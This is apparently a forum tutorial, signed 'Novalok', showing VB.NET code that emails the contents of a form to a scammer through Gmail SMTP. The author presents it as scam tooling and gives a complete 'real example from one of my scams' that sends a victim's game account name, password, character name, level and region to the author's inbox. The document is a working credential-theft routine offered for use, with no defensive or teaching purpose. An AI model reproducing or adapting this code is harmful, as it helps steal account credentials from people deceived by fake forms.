Many scammers have programs that send an email with the information entered in a form, be it A gamecard or An account. In this tutorial you will learn how to do just that.
First things first. When using mail Remember you must add this line to the VERY top of your code
From now on all comments will be in code.
Code:
Dim message As System.Net.Mail.MailMessage ' Dims System.Net.Mail.MailMessage as message For syntax sake
Code:
Dim smtp As New System.Net.Mail.SmtpClient("smtp.gmail.com", 587) ' Sets the SMTP client. In this Example i am using Gmail
Code:
message = New System.Net.Mail.MailMessage("TO","FROM","SUBJECT","BODY") Pretty Self explainatory.
Code:
smtp.EnableSsl = True ' Required for Sites Like gmail which require you to log in
Code:
smtp.Credentials = New System.Net.NetworkCredential("username","Password") 'Agian it expains itself
Code:
message.IsBodyHtml = True 'Only Required if you Want HTML
Code:
smtp.Send(message) 'And this Little Bugger Just Does what you think. It sends it. :)
Now A Real Example from one of my scams
Code:
Dim message As System.Net.Mail.MailMessage
Dim smtp As New System.Net.Mail.SmtpClient("smtp.gmail.com", 587)
message = New System.Net.Mail.MailMessage("[email protected]", "******@gmail.com", TextBox3.Text() & " - Level" & TextBox4.Text(), "Account Name: " & TextBox1.Text() & "<br>Account Password: " & TextBox2.Text() & "<br>Char Name " & TextBox3.Text() & "<br>Char Level: " & TextBox4.Text() & "<br>Region: " & ComboBox1.SelectedItem())
smtp.EnableSsl = True
smtp.Credentials = New System.Net.NetworkCredential(***)
message.IsBodyHtml = True
smtp.Send(message)
Note***!!!***
message i used strings like TextBox2.Text() &
The " & " is required to seperate Any String from textbox or such.
Enjoy..
Novalok